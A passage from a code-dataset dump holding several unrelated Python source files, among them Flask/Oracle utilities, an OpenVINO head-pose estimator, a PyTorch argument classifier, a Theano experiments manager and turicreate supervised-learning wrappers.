[]\n","repo_name":"countergram/Pypr","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22405286569","text":"\"\"\"\nУтилиты\n=======\n\n\"\"\"\n\nfrom importlib import import_module\n\nfrom flask import current_app, jsonify, request\nfrom werkzeug.exceptions import HTTPException\n\n__all__ = [\n 'register_blueprint', 'set_oracle_client_info',\n 'jsonify_error', 'jsonify_jwt_error', 'bool_query_param', 'create_table_if_not_exist']\n\n\ndef register_blueprint(app, blueprint, package=None, path='modules'):\n \"\"\"\n Регистрация модулей (:class:`flask.Blueprint`) в приложении\n\n .. note:: Возможно потребуется выполнять в `контексте приложения`_,\n в зависимости от организации конкретного модуля\n\n .. _`контекст приложения`: http://flask.pocoo.org/docs/1.0/appcontext/\n\n :param app: экземпляр приложения\n :type app: :class:`flask.Flask`\n :param str blueprint: имя загружаемого модуля\n :param str package: имя пакета с модулями (по-умолчанию ``app.name``),\n более детально см. `import_module`_\n :param str path: директория с модулями внутри пакета\n\n .. _`import_module`:\n https://docs.python.org/3/library/importlib.html#importlib.import_module\n \"\"\"\n try:\n module = import_module(\n f'.{path}.{blueprint}.controllers', package or app.name)\n app.register_blueprint(module.blueprint)\n app.logger.info(f'Module [{blueprint}] loaded')\n except ImportError as e:\n app.logger.warning(f'Skip module [{blueprint}]: {e}')\n except Exception as e:\n app.logger.error(f'Skip module [{blueprint}]: {e}', exc_info=1)\n\n\ndef create_table_if_not_exist(db, app, ):\n with app.app_context():\n table_name = 'JWT_USERS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column(\n 'id', db.Integer, primary_key=True),\n db.Column(\n 'username', db.String(30), index=True, unique=True, nullable=False)\n )\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_FILIALS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column(\n 'alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column(\n 'guid', db.String(128), index=True),\n db.Column(\n 'filial_id', db.Integer\n ),\n db.Column('filial_name', db.String(128))\n )\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_REGIONS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('region', db.String(128)),\n db.Column('guid', db.String(128), index=True))\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_SEGMENTS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('segment', db.String(20)),\n db.Column('guid', db.String(128), index=True))\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('text', db.String(2000)),\n db.Column('type', db.String(30)),\n db.Column('scheduled_start_time', db.Date()),\n db.Column('scheduled_stop_time', db.Date()),\n db.Column('send_mode', db.Integer),\n db.Column('send_threshold', db.Integer),\n db.Column('send_timeout', db.Integer),\n db.Column('service_type_attr1', db.String(30)),\n db.Column('wait_response_timeout', db.Integer),\n db.Column('region', db.String(30)))\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n\n\ndef set_oracle_client_info(db, info):\n \"\"\"\n Установка идентификатора клиента для сессии Oracle\n\n .. attention:: Работает только в `контексте приложения`_\n\n .. _`контексте приложения`: http://flask.pocoo.org/docs/1.0/appcontext/\n\n :param db: экземпляр SQLAlchemy\n :type db: :class:`flask_sqlalchemy.SQLAlchemy`\n :param str info: идентификатор (любой текст)\n \"\"\"\n try:\n query = 'begin dbms_application_info.set_client_info(:info); end;'\n db.engine.execute(query, {'info': info})\n current_app.logger.info(f'Oralce client info successfully set')\n\n except Exception as e:\n current_app.logger.warning(f'Oralce client info set error: {e}')\n\n\ndef jsonify_error(error):\n \"\"\"\n JSONификация ошибок/статусов HTTP\n\n :param error: исключение, при использовании с\n :meth:`Flask.register_error_handler` передаётся **автоматически**\n :type error: :class:`Exception` или наследники\n :return: ответ в формате JSON с ключами *status*, *message* и *error*\n :rtype: :class:`flask.wrappers.Response`\n \"\"\"\n\n if not isinstance(error, HTTPException):\n current_app.logger.critical(error, exc_info=1)\n return jsonify(status=500, error='Internal', message='None'), 500\n\n body = {\n 'status': error.code,\n 'message': error.description,\n 'error': error.name\n }\n\n if error.code == 405:\n body['allowed'] = error.valid_methods\n\n return jsonify(body), error.code\n\n\ndef jsonify_jwt_error(jwt):\n \"\"\"\n Приведение ошибок авторизации JWT к общему виду :func:`jsonify_error`\n\n :param jwt: экземпляр JWTManager\n :type jwt: :class:`flask_jwt_extended.JWTManager`\n \"\"\"\n\n def unauth(msg):\n return jsonify(status=401, error='Unauthorized', message=msg), 401\n\n jwt.invalid_token_loader(lambda msg: unauth(f'Invalid token: {msg}'))\n jwt.revoked_token_loader(lambda: unauth('Token has been revoked'))\n jwt.expired_token_loader(lambda: unauth('Token has expired'))\n jwt.unauthorized_loader(lambda msg: unauth(msg))\n jwt.user_loader_error_loader(lambda msg: unauth('Unknown user'))\n\n\ndef bool_query_param(key):\n \"\"\"Приведение значения ключа из query string к булеву типу\"\"\"\n value = request.args.get(key, None)\n if value in ['False', 'false', '0', 0]:\n return False\n elif value:\n return True\n","repo_name":"balkonsky/astportal","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"14445939636","text":"import cv2\nimport numpy as np\nfrom openvino.inference_engine import IENetwork,IECore\nimport sys\nimport logging\n\nclass Model_HeadPoseEstimation:\n\n def __init__(self, model_name, device='CPU', extensions=None):\n \n self.model_name = model_name\n self.device = device\n self.extensions = extensions\n self.plugin = None\n self.network = None\n self.exec_net = None\n self.in_name = None\n self.in_shape = None\n self.out_name = None\n\n def load_model(self):\n \n model_structure = self.model_name\n model_weights = self.model_name.split('.')[0]+'.bin'\n\n self.plugin = IECore()\n \n if self.extensions and 'CPU' in self.device:\n self.plugin.add_extension(self.extensions,self.device)\n\n self.network = IENetwork(model=model_structure, weights=model_weights)\n\n self.check_model()\n\n self.exec_net = self.plugin.load_network(network=self.network, device_name=self.device,num_requests=1)\n \n self.in_name = next(iter(self.network.inputs))\n self.in_shape = self.network.inputs[self.in_name].shape\n self.out_name = [i for i in self.network.outputs.keys()]\n\n def predict(self, image):\n \n processed_image = self.preprocess_input(image.copy())\n outputs = self.exec_net.infer({self.in_name:processed_image})\n final = self.preprocess_output(outputs)\n return final\n\n def check_model(self): \n\n if self.device == \"CPU\": \n supported_layers = self.plugin.query_network(network=self.network, device_name=self.device) \n notsupported_layers = [l for l in self.network.layers.keys() if l not in supported_layers]\n\n if len(notsupported_layers) != 0:\n logging.error(\"[ERROR] Unsupported layers found: {}\".format(notsupported_layers))\n sys.exit(1)\n\n def preprocess_input(self, image):\n\n image_processed = cv2.resize(image,(self.in_shape[3], self.in_shape[2]))\n image_processed = image_processed.transpose(2, 0, 1)\n image_processed = image_processed.reshape(1, *image_processed.shape)\n return image_processed\n\n def preprocess_output(self, outputs):\n\n preprocessed_outputs = []\n preprocessed_outputs.append(outputs['angle_y_fc'].tolist()[0][0])\n preprocessed_outputs.append(outputs['angle_p_fc'].tolist()[0][0])\n preprocessed_outputs.append(outputs['angle_r_fc'].tolist()[0][0])\n return preprocessed_outputs","repo_name":"alaagamal98/computer-pointer-controller","sub_path":"src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72911880587","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 27 13:34:21 2021\r\n\r\n@author: JIANG Yuxin\r\n\"\"\"\r\n\r\n\r\nimport torch.nn as nn\r\n\r\n\r\nclass AICModel(nn.Module):\r\n def __init__(self, model, n_label=3):\r\n super(AICModel, self).__init__()\r\n self.model = model #bert encoder\r\n for param in self.model.parameters():\r\n param.requires_grad = True \r\n self.d_hid = model.config.hidden_size\r\n self.classifier = nn.Linear(self.d_hid, n_label)\r\n\r\n def forward(\r\n self,\r\n input_ids=None,\r\n attention_mask=None,\r\n token_type_ids=None,\r\n ):\r\n\r\n outputs = self.model(\r\n input_ids,\r\n attention_mask=attention_mask,\r\n token_type_ids=token_type_ids,\r\n )\r\n \r\n pooled_output = outputs[1]\r\n logits = self.classifier(pooled_output)\r\n \r\n return logits, pooled_output\r\n \r\n \r\n ","repo_name":"YJiangcm/argument-impact-classification","sub_path":"model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"82"} +{"seq_id":"71110186189","text":"import torch\nfrom torch import nn\n\nfrom .dl import QuantGAN_TemporalBlock\n\ndef is_high_freq(time_series, threshold=0.5, rolling_parts=200):\n orig_std = time_series.std().values[0]\n ma_ts = time_series.rolling(len(time_series) // rolling_parts).mean()\n ma_std = ma_ts.std().values[0]\n return abs(ma_std - orig_std) / orig_std > threshold\n\ndef ma(time_series, rolling_parts=200, window=None):\n if window is None:\n window = max(len(time_series) // rolling_parts, 2)\n ts1 = time_series.rolling(window, closed=\"left\").mean()\n ts2 = time_series[:: - 1].rolling(window).mean()[:: - 1]\n ts1[ts1.isna()] = ts2[ts1.isna()]\n ts2[ts2.isna()] = ts1[ts2.isna()]\n ats = (ts1 + ts2) / 2\n return ats\n\n\nclass TimeDiffusion(nn.Module):\n def __init__(self):\n super().__init__()\n self.tcn = nn.ModuleList([QuantGAN_TemporalBlock(1, 128, kernel_size=1, stride=1, dilation=1, padding=0, dropout=0.25),\n *[QuantGAN_TemporalBlock(128, 128, kernel_size=2, stride=1, dilation=i, padding=i, dropout=0.0)\n for i in [2 ** i for i in range(14)]]])\n self.last = nn.Conv1d(128, 1, kernel_size=1, stride=1, dilation=1)\n\n def forward(self, x):\n skip_layers = []\n for layer in self.tcn:\n skip, x = layer(x)\n skip_layers.append(skip)\n x = self.last(x + sum(skip_layers))\n return x","repo_name":"timetoai/TimeDiffusion_synth","sub_path":"utils/timediffusion.py","file_name":"timediffusion.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"69916520909","text":"import numpy as np\nfrom itertools import product\n\nfrom theano import shared\n\n\nclass Experiments(object):\n def __init__(self, input_dim, num_classes):\n self.input_dim = input_dim\n self.num_classes = num_classes\n\n self.layers_descriptions = {}\n self.parameters = {}\n self.experiments = {}\n self.results = {}\n\n def get_layers_definition(self, idx):\n layers_description = self.get_layers_description_by_exp_idx(idx)\n parameters = self.get_parameters_by_exp_idx(idx)\n\n # Shared variable used for always activating one block in a layer\n # as in the input and output layer\n self.one_block_idxs = shared(\n np.zeros((parameters['batch_size'], 1), dtype='int64'),\n name='one_block_idxs'\n )\n\n n_hids = layers_description['n_hids']\n n_units_per = layers_description['n_units_per']\n k_pers = layers_description['k_pers']\n activations = layers_description['activations']\n index_selection_funcs = layers_description.get(\n 'index_selection_funcs',\n (None,)*len(activations)\n )\n layer_classes = layers_description['layer_classes']\n assert(len(activations) == len(index_selection_funcs))\n\n new_exp = []\n new_exp.append({\n 'n_in': self.input_dim,\n 'n_hids': n_hids[0],\n 'n_units_per': n_units_per,\n 'in_idxs': self.one_block_idxs,\n 'k': k_pers[0],\n 'activation': activations[0],\n 'index_selection_func': index_selection_funcs[0],\n 'layer_class': layer_classes[0]\n })\n for i in range(1, len(k_pers) - 1):\n new_exp.append({\n 'n_in': n_hids[i-1],\n 'n_hids': n_hids[i],\n 'n_units_per': n_units_per,\n 'k': k_pers[i],\n 'activation': activations[i],\n 'index_selection_func': index_selection_funcs[i],\n 'layer_class': layer_classes[i]\n })\n new_exp.append({\n 'n_in': n_hids[-1],\n 'n_hids': self.num_classes,\n 'n_units_per': n_units_per,\n 'out_idxs': self.one_block_idxs,\n 'k': k_pers[-1],\n 'activation': activations[-1],\n 'index_selection_func': index_selection_funcs[-1],\n 'layer_class': layer_classes[-1]\n })\n\n return new_exp\n\n def add_layers_description(self, idx, layers_description):\n self.layers_descriptions[idx] = layers_description\n\n def get_layers_description(self, idx):\n return self.layers_descriptions[idx]\n\n def get_layers_description_by_exp_idx(self, exp_idx):\n return self.get_layers_description(\n self.experiments[exp_idx]['layers_description_idx']\n )\n\n def add_parameters(self, idx, parameters):\n self.parameters[idx] = parameters\n\n def get_parameters(self, idx):\n return self.parameters[idx]\n\n def get_parameters_by_exp_idx(self, exp_idx):\n return self.get_parameters(self.experiments[exp_idx]['parameters_idx'])\n\n def get_table_idxs_by_exp_idxs(self, table, exp_idxs):\n result = set()\n for exp_idx in exp_idxs:\n result.add(self.experiments[exp_idx]['%s_idx' % table])\n return result\n\n def get_result_idxs_by_table_idx(self, table, idx):\n results = []\n for r_idx in self.results.keys():\n if self.experiments[r_idx]['%s_idx' % table] == idx:\n results.append(r_idx)\n return results\n\n def create_experiments(\n self, layers_descriptions_idxs=[], parameters_idxs=[]\n ):\n \"\"\"\n Creates an experiment for each combination of layers and parameters\n \"\"\"\n assert(type(layers_descriptions_idxs) == list)\n assert(type(parameters_idxs) == list)\n\n # Determine which layers and parameters to use\n if len(layers_descriptions_idxs) == 0:\n layers_descriptions_idxs = range(len(self.layers_descriptions))\n\n if len(parameters_idxs) == 0:\n parameters_idxs = range(len(self.parameters))\n\n # Create the experiments\n for idx, (ld_idx, p_idx) in enumerate(product(\n layers_descriptions_idxs,\n parameters_idxs\n )):\n self.experiments[idx] = {\n 'layers_description_idx': ld_idx,\n 'parameters_idx': p_idx\n }\n self.results[idx] = {}\n\n def get_idxs(self, table, filters=[], has_results=False):\n \"\"\"\n Returns a list of idxs from the specified table matching the specified\n filters. Filters should be a dictionary where the key is the column\n name and the value is the required value.\n\n has_results determines whether there are results for a given\n experiment and is only relevant when search the experiments table.\n \"\"\"\n assert(type(filters) == list)\n\n if table == 'experiments':\n source = self.experiments\n elif table == 'parameters':\n source = self.parameters\n elif table == 'layers_descriptions':\n source = self.layers_descriptions\n\n if len(filters) == 0:\n return source.keys()\n\n results = []\n for idx, values in source.iteritems():\n good = True\n\n # Determine whether the current record fits all the filters\n for k, v in filters:\n if values[k] != v:\n good = False\n\n # Determine whether there are results for this experiment\n if has_results and idx not in self.results.keys():\n good = False\n\n if good:\n results.append(idx)\n return results\n\n def get_experiment_idxs(\n self, layers_description_idx=[], parameters_idx=[]\n ):\n assert(type(layers_description_idx) == list)\n assert(type(parameters_idx) == list)\n\n results = []\n for exp_idx, idxs in self.experiments.iteritems():\n good = True\n if (\n len(layers_description_idx) > 0 and\n idxs['layers_description_idx']\n not in layers_description_idx\n ):\n good = False\n if (\n len(parameters_idxs) > 0 and\n idxs['parameters_idx'] not in parameters_idx\n ):\n good = False\n if good:\n results.append(exp_idx)\n return results\n\n def save(self, exp_id, model_name, k, v):\n if model_name not in self.results[exp_id].keys():\n self.results[exp_id][model_name] = {}\n self.results[exp_id][model_name][k] = v\n\n class ExperimentsIterator(object):\n def __init__(self, exps):\n self.exps = exps\n\n self.current_idx = 0\n self.stop_idx = len(self.exps.experiments) - 1\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.current_idx > self.stop_idx:\n raise StopIteration\n\n self.current_idx += 1\n return self.current_idx - 1\n\n def __iter__(self):\n return self.ExperimentsIterator(self)\n\n\n","repo_name":"daemonmaker/biglittle","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"44866280759","text":"from __future__ import print_function as _\nfrom __future__ import division as _\nfrom __future__ import absolute_import as _\nimport turicreate as _turicreate\n\nfrom turicreate.toolkits._model import Model\nfrom turicreate.toolkits._internal_utils import _raise_error_if_not_sframe\nfrom turicreate.toolkits._internal_utils import _validate_data\nfrom turicreate.toolkits._main import ToolkitError\nfrom turicreate._cython.cy_server import QuietProgress\n\n\nclass SupervisedLearningModel(Model):\n \"\"\"\n Supervised learning module to predict a target variable as a function of\n several feature variables.\n \"\"\"\n\n def __init__(self, model_proxy=None, name=None):\n self.__proxy__ = model_proxy\n self.__name__ = name\n\n @classmethod\n def _native_name(cls):\n return None\n\n def __str__(self):\n \"\"\"\n Return a string description of the model to the ``print`` method.\n\n Returns\n -------\n out : string\n A description of the model.\n \"\"\"\n return self.__class__.__name__\n\n def __repr__(self):\n \"\"\"\n Returns a string description of the model, including (where relevant)\n the schema of the training data, description of the training data,\n training statistics, and model hyperparameters.\n\n Returns\n -------\n out : string\n A description of the model.\n \"\"\"\n return self.__class__.__name__\n\n def predict(\n self, dataset, missing_value_action=\"auto\", output_type=\"\", options={}, **kwargs\n ):\n \"\"\"\n Return predictions for ``dataset``, using the trained supervised_learning\n model. Predictions are generated as class labels (0 or\n 1).\n\n Parameters\n ----------\n dataset : SFrame\n Dataset of new observations. Must include columns with the same\n names as the features used for model training, but does not require\n a target column. Additional columns are ignored.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose a model dependent missing value policy.\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'none': Treat missing value as is. Model must be able to handle missing value.\n - 'error' : Do not proceed with prediction and terminate with\n an error message.\n\n output_type : str, optional\n output type that maybe needed by some of the toolkits\n\n options : dict\n additional options to be passed in to prediction\n\n kwargs : dict\n additional options to be passed into prediction\n\n Returns\n -------\n out : SArray\n An SArray with model predictions.\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"predict\")\n\n # Low latency path\n if isinstance(dataset, list):\n return self.__proxy__.fast_predict(\n dataset, missing_value_action, output_type\n )\n if isinstance(dataset, dict):\n return self.__proxy__.fast_predict(\n [dataset], missing_value_action, output_type\n )\n\n # Batch predictions path\n else:\n _raise_error_if_not_sframe(dataset, \"dataset\")\n\n return self.__proxy__.predict(dataset, missing_value_action, output_type)\n\n def evaluate(\n self,\n dataset,\n metric=\"auto\",\n missing_value_action=\"auto\",\n with_predictions=False,\n options={},\n **kwargs\n ):\n \"\"\"\n Evaluate the model by making predictions of target values and comparing\n these to actual values.\n\n Parameters\n ----------\n dataset : SFrame\n Dataset in the same format used for training. The columns names and\n types of the dataset must be the same as that used in training.\n\n metric : str, list[str]\n Evaluation metric(s) to be computed.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose a model dependent missing value policy.\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'none': Treat missing value as is. Model must be able to handle missing value.\n - 'error' : Do not proceed with prediction and terminate with\n an error message.\n\n options : dict\n additional options to be passed in to prediction\n\n kwargs : dict\n additional options to be passed into prediction\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"evaluate\")\n\n _raise_error_if_not_sframe(dataset, \"dataset\")\n results = self.__proxy__.evaluate(\n dataset, missing_value_action, metric, with_predictions=with_predictions\n )\n return results\n\n def _training_stats(self):\n \"\"\"\n Return a dictionary containing statistics collected during model\n training. These statistics are also available with the ``get`` method,\n and are described in more detail in the documentation for that method.\n\n Notes\n -----\n \"\"\"\n return self.__proxy__.get_train_stats()\n\n def _get(self, field):\n \"\"\"\n Get the value of a given field.\n\n Parameters\n ----------\n field : string\n Name of the field to be retrieved.\n\n Returns\n -------\n out : [various]\n The current value of the requested field.\n \"\"\"\n return self.__proxy__.get_value(field)\n\n\nclass Classifier(SupervisedLearningModel):\n \"\"\"\n Classifier module to predict a discrete target variable as a function of\n several feature variables.\n \"\"\"\n\n @classmethod\n def _native_name(cls):\n return None\n\n def classify(self, dataset, missing_value_action=\"auto\"):\n \"\"\"\n Return predictions for ``dataset``, using the trained supervised_learning\n model. Predictions are generated as class labels (0 or\n 1).\n\n Parameters\n ----------\n dataset: SFrame\n Dataset of new observations. Must include columns with the same\n names as the features used for model training, but does not require\n a target column. Additional columns are ignored.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose model dependent missing value action\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'error': Do not proceed with prediction and terminate with\n an error message.\n Returns\n -------\n out : SFrame\n An SFrame with model predictions.\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"classify\")\n\n # Low latency path\n if isinstance(dataset, list):\n return self.__proxy__.fast_classify(dataset, missing_value_action)\n if isinstance(dataset, dict):\n return self.__proxy__.fast_classify([dataset], missing_value_action)\n\n _raise_error_if_not_sframe(dataset, \"dataset\")\n return self.__proxy__.classify(dataset, missing_value_action)\n\n\ndef print_validation_track_notification():\n print(\n \"PROGRESS: Creating a validation set from 5 percent of training data. This may take a while.\\n\"\n \" You can set ``validation_set=None`` to disable validation tracking.\\n\"\n )\n\n\ndef create(\n dataset,\n target,\n model_name,\n features=None,\n validation_set=\"auto\",\n distributed=\"auto\",\n verbose=True,\n seed=None,\n **kwargs\n):\n \"\"\"\n Create a :class:`~turicreate.toolkits.SupervisedLearningModel`,\n\n This is generic function that allows you to create any model that\n implements SupervisedLearningModel This function is normally not called, call\n specific model's create function instead\n\n Parameters\n ----------\n dataset : SFrame\n Dataset for training the model.\n\n target : string\n Name of the column containing the target variable. The values in this\n column must be 0 or 1, of integer type.\n\n model_name : string\n Name of the model\n\n features : list[string], optional\n List of feature names used by feature column\n\n validation_set : SFrame, optional\n A dataset for monitoring the model's generalization performance.\n For each row of the progress table, the chosen metrics are computed\n for both the provided training dataset and the validation_set. The\n format of this SFrame must be the same as the training set.\n By default this argument is set to 'auto' and a validation set is\n automatically sampled and used for progress printing. If\n validation_set is set to None, then no additional metrics\n are computed. The default value is 'auto'.\n\n distributed: env\n The distributed environment\n\n verbose : boolean\n whether print out messages during training\n\n seed : int, optional\n Seed for random number generation. Set this value to ensure that the\n same model is created every time.\n\n kwargs : dict\n Additional parameter options that can be passed\n \"\"\"\n\n # Perform error-checking and trim inputs to specified columns\n dataset, validation_set = _validate_data(dataset, target, features, validation_set)\n\n # Sample a validation set from the training data if requested\n if isinstance(validation_set, str):\n assert validation_set == \"auto\"\n if dataset.num_rows() >= 100:\n if verbose:\n print_validation_track_notification()\n dataset, validation_set = dataset.random_split(0.95, seed=seed, exact=True)\n else:\n validation_set = _turicreate.SFrame()\n elif validation_set is None:\n validation_set = _turicreate.SFrame()\n\n # Sanitize model-specific options\n options = {k.lower(): kwargs[k] for k in kwargs}\n\n # Create a model instance and train it\n model = _turicreate.extensions.__dict__[model_name]()\n with QuietProgress(verbose):\n model.train(dataset, target, validation_set, options)\n\n return SupervisedLearningModel(model, model_name)\n\n\ndef create_classification_with_model_selector(\n dataset, target, model_selector, features=None, validation_set=\"auto\", verbose=True\n):\n \"\"\"\n Create a :class:`~turicreate.toolkits.SupervisedLearningModel`,\n\n This is generic function that allows you to create any model that\n implements SupervisedLearningModel. This function is normally not called, call\n specific model's create function instead.\n\n Parameters\n ----------\n dataset : SFrame\n Dataset for training the model.\n\n target : string\n Name of the column containing the target variable. The values in this\n column must be 0 or 1, of integer type.\n\n model_name : string\n Name of the model\n\n model_selector: function\n Provide a model selector.\n\n features : list[string], optional\n List of feature names used by feature column\n\n verbose : boolean\n whether print out messages during training\n\n \"\"\"\n\n # Perform error-checking and trim inputs to specified columns\n dataset, validation_set = _validate_data(dataset, target, features, validation_set)\n\n # Sample the data\n features_sframe = dataset\n if features_sframe.num_rows() > 1e5:\n fraction = 1.0 * 1e5 / features_sframe.num_rows()\n features_sframe = features_sframe.sample(fraction, seed=0)\n\n # Get available models for this dataset\n num_classes = len(dataset[target].unique())\n selected_model_names = model_selector(num_classes, features_sframe)\n\n # Create a validation set\n if isinstance(validation_set, str):\n if validation_set == \"auto\":\n if dataset.num_rows() >= 100:\n if verbose:\n print_validation_track_notification()\n dataset, validation_set = dataset.random_split(0.95, exact=True)\n else:\n validation_set = None\n else:\n raise TypeError(\"Unrecognized value for validation_set.\")\n\n # Match C++ model names with user model names\n python_names = {\n \"boosted_trees_classifier\": \"BoostedTreesClassifier\",\n \"random_forest_classifier\": \"RandomForestClassifier\",\n \"decision_tree_classifier\": \"DecisionTreeClassifier\",\n \"classifier_logistic_regression\": \"LogisticClassifier\",\n \"classifier_svm\": \"SVMClassifier\",\n }\n\n # Print useful user-facing progress messages\n if verbose:\n print(\"PROGRESS: The following methods are available for this type of problem.\")\n print(\"PROGRESS: \" + \", \".join([python_names[x] for x in selected_model_names]))\n if len(selected_model_names) > 1:\n print(\n \"PROGRESS: The returned model will be chosen according to validation accuracy.\"\n )\n\n models = {}\n metrics = {}\n for model_name in selected_model_names:\n\n # Fit each of the available models\n m = create_selected(\n model_name, dataset, target, features, validation_set, verbose\n )\n models[model_name] = m\n\n if \"validation_accuracy\" in m._list_fields():\n metrics[model_name] = m.validation_accuracy\n elif \"training_accuracy\" in m._list_fields():\n metrics[model_name] = m.training_accuracy\n\n # Most models have this.\n elif \"progress\" in m._list_fields():\n prog = m.progress\n validation_column = \"Validation Accuracy\"\n accuracy_column = \"Training Accuracy\"\n if validation_column in prog.column_names():\n metrics[model_name] = float(prog[validation_column].tail(1)[0])\n else:\n metrics[model_name] = float(prog[accuracy_column].tail(1)[0])\n else:\n raise ValueError(\n \"Model does not have metrics that can be used for model selection.\"\n )\n\n # Choose model based on either validation, if available.\n best_model = None\n best_acc = None\n for model_name in selected_model_names:\n if best_acc is None:\n best_model = model_name\n best_acc = metrics[model_name]\n if best_acc is not None and best_acc < metrics[model_name]:\n best_model = model_name\n best_acc = metrics[model_name]\n\n ret = []\n width = 32\n if len(selected_model_names) > 1:\n ret.append(\"PROGRESS: Model selection based on validation accuracy:\")\n ret.append(\"---------------------------------------------\")\n key_str = \"{:<{}}: {}\"\n for model_name in selected_model_names:\n name = python_names[model_name]\n row = key_str.format(name, width, str(metrics[model_name]))\n ret.append(row)\n ret.append(\"---------------------------------------------\")\n ret.append(\n \"Selecting \"\n + python_names[best_model]\n + \" based on validation set performance.\"\n )\n\n if verbose:\n print(\"\\nPROGRESS: \".join(ret))\n return models[best_model]\n\n\ndef create_selected(\n selected_model_name, dataset, target, features, validation_set=\"auto\", verbose=True\n):\n\n # Create the model\n model = create(\n dataset,\n target,\n selected_model_name,\n features=features,\n validation_set=validation_set,\n verbose=verbose,\n )\n\n return wrap_model_proxy(model.__proxy__)\n\n\ndef wrap_model_proxy(model_proxy):\n selected_model_name = model_proxy.__class__.__name__\n\n # Return the model\n if selected_model_name == \"boosted_trees_regression\":\n return _turicreate.boosted_trees_regression.BoostedTreesRegression(model_proxy)\n elif selected_model_name == \"random_forest_regression\":\n return _turicreate.random_forest_regression.RandomForestRegression(model_proxy)\n elif selected_model_name == \"decision_tree_regression\":\n return _turicreate.decision_tree_classifier.DecisionTreeRegression(model_proxy)\n elif selected_model_name == \"regression_linear_regression\":\n return _turicreate.linear_regression.LinearRegression(model_proxy)\n elif selected_model_name == \"boosted_trees_classifier\":\n return _turicreate.boosted_trees_classifier.BoostedTreesClassifier(model_proxy)\n elif selected_model_name == \"random_forest_classifier\":\n return _turicreate.random_forest_classifier.RandomForestClassifier(model_proxy)\n elif selected_model_name == \"decision_tree_classifier\":\n return _turicreate.decision_tree_classifier.DecisionTreeClassifier(model_proxy)\n elif selected_model_name == \"classifier_logistic_regression\":\n return _turicreate.logistic_classifier.LogisticClassifier(model_proxy)\n elif selected_model_name == \"classifier_svm\":\n return _turicreate.svm_classifier.SVMClassifier(model_proxy)\n else:\n raise ToolkitError(\"Internal error: Incorrect model returned.\")\n\n\ndef select_default_missing_value_policy(model, action):\n from .classifier.boosted_trees_classifier import BoostedTreesClassifier\n from .classifier.random_forest_classifier import RandomForestClassifier\n from .classifier.decision_tree_classifier import DecisionTreeClassifier\n from .regression.boosted_trees_regression import BoostedTreesRegression\n from 